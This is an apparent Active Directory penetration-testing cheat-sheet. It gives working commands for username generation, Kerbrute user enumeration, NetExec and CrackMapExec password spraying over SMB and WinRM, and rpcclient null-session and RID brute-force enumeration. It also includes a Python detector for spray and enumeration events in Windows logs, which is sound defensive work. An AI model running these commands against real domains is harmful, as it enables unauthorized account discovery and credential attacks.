Disclaimer: This material is provided for educational purposes and authorized security testing only. You are solely responsible for how you use the information. Do not use these techniques on systems without explicit permission from the owner. We do not encourage any kind of illegal or harmful activity.
Generate User List
- Use sites like hunter.io to discover employee email patterns. For example, entering apple.com shows that emails often follow {f}{last}@apple.com. By scraping a list of Apple employees from LinkedIn, you can convert names into emails (e.g., Steve Jobs → s.jobs@apple.com). Not all guesses will be correct, but many should be valid.
- Use a Python script (namemash.py) to generate potential usernames from the scraped names:
    wget https://gist.githubusercontent.com/superkojiman/11076951/raw/74f3de7740acb197ecfa8340d07d3926a95e5d46/namemash.py
- Verify which of the generated usernames actually exist in the domain with Kerbrute:
    kerbrute userenum --dc [IP-ADDRESS] -d hackfast.local username.lst
  Note: You can also use built-in wordlists, e.g.:
    /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
SMB Enumeration
- Enumerate with NetExec (tries one password against every user in the list; --continue-on-success keeps going after a valid credential is found instead of stopping at the first hit):
    netexec smb [IP-ADDRESS] -u users.txt -p '[PASSWORD]' --continue-on-success
- Enumerate with CrackMapExec (same options, older tool):
    crackmapexec smb [IP-ADDRESS] -u users.txt -p '[PASSWORD]' --continue-on-success
WinRM Enumeration
- Enumerate with NetExec:
    netexec winrm office.htb -u users.txt -p '[PASSWORD]' --continue-on-success
- Enumerate with CrackMapExec:
    crackmapexec winrm 10.10.10.184 -u users.txt -p '[PASSWORD]' --continue-on-success
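The Kerbrute user enumeration and the NetExec/CrackMapExec sprays above leave a distinctive footprint on the domain controller, which is what a blue team keys on. As an added example (not part of the original cheat-sheet), a small Python detector over constructed Security-log records: it flags any source that fails against many distinct accounts inside a short window, treating event 4768 with result 0x6 as user enumeration and a burst of 4625 failures as a password spray. The event IDs and result codes are the standard Windows ones; the sample records, the 5-minute window and the threshold of 5 accounts are assumptions to tune for your own environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of parsed Security-log records (not real data): 4768 is a Kerberos
# TGT request, result 0x6 = no such principal ("kerbrute userenum"); 4625 is a failed logon.
SAMPLE_EVENTS = [
    {"ts": "2024-01-10T09:00:01", "id": 4768, "src": "10.0.0.50", "user": "s.jobs", "status": "0x6"},
    {"ts": "2024-01-10T09:00:02", "id": 4768, "src": "10.0.0.50", "user": "sjobs", "status": "0x6"},
    {"ts": "2024-01-10T09:00:02", "id": 4768, "src": "10.0.0.50", "user": "steve.j", "status": "0x6"},
    {"ts": "2024-01-10T09:00:03", "id": 4768, "src": "10.0.0.50", "user": "jobs", "status": "0x6"},
    {"ts": "2024-01-10T09:00:03", "id": 4768, "src": "10.0.0.50", "user": "j.steve", "status": "0x6"},
    {"ts": "2024-01-10T09:00:04", "id": 4768, "src": "10.0.0.50", "user": "swoz", "status": "0x6"},
    # one user mistyping their own password twice is normal, not a spray
    {"ts": "2024-01-10T09:10:00", "id": 4625, "src": "10.0.0.77", "user": "alice", "status": "0xC000006A"},
    {"ts": "2024-01-10T09:10:30", "id": 4625, "src": "10.0.0.77", "user": "alice", "status": "0xC000006A"},
    # a spray: one source, many accounts, one failure each, seconds apart
    {"ts": "2024-01-10T11:00:00", "id": 4625, "src": "10.0.0.50", "user": "alice", "status": "0xC000006A"},
    {"ts": "2024-01-10T11:00:01", "id": 4625, "src": "10.0.0.50", "user": "bob", "status": "0xC000006A"},
    {"ts": "2024-01-10T11:00:01", "id": 4625, "src": "10.0.0.50", "user": "carol", "status": "0xC000006A"},
    {"ts": "2024-01-10T11:00:02", "id": 4625, "src": "10.0.0.50", "user": "dave", "status": "0xC000006A"},
    {"ts": "2024-01-10T11:00:02", "id": 4625, "src": "10.0.0.50", "user": "erin", "status": "0xC000006A"},
]

# Tracked (event id, result) pairs; 0x18 = Kerberos pre-auth failed (wrong password). Tune to taste.
FAILURE_KINDS = {
    (4768, "0x6"): "kerberos_user_enum",
    (4768, "0x18"): "kerberos_password_spray",
    (4625, None): "logon_password_spray",
}

def classify(ev):
    """Map one record to a failure kind, or None if it is not a tracked failure."""
    return FAILURE_KINDS.get((ev["id"], ev["status"] if ev["id"] == 4768 else None))

def detect_spray(events, window=timedelta(minutes=5), threshold=5):
    """Return {(src, kind): n} for sources failing against >= threshold distinct accounts in one window."""
    buckets = defaultdict(list)
    for ev in events:
        kind = classify(ev)
        if kind:
            buckets[(ev["src"], kind)].append((datetime.fromisoformat(ev["ts"]), ev["user"].lower()))
    alerts = {}
    for key, hits in buckets.items():
        hits.sort()  # sliding window over time-ordered failures per source and kind
        for i, (start, _) in enumerate(hits):
            users = {u for t, u in hits[i:] if t - start <= window}
            if len(users) >= threshold:
                alerts[key] = max(alerts.get(key, 0), len(users))
    return alerts
```

Note that 4768 events with a failure code only appear when "Audit Kerberos Authentication Service" auditing is enabled on the DC, so check that policy before relying on the Kerberos rule.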
RPCClient Enumeration
- Start a null session:
    rpcclient -U "" -N [IP_ADDRESS]
- List all users in the domain:
    rpcclient -U "" -N [IP_ADDRESS] -c "enumdomusers" > output.txt
- Extract the usernames from the output (each line has the form user:[name] rid:[0x...], so split on the square brackets and keep the second field):
    awk -F'[][]' '{print $2}' output.txt > users.lst
- Brute-force user RIDs (grep -E is required, otherwise the | in the pattern is treated literally and nothing matches):
    for i in $(seq 500 1100); do rpcclient -N -U "" [IP_ADDRESS] -c "queryuser 0x$(printf '%x' $i)" | grep -E "User Name|user_rid|group_rid" && echo ""; done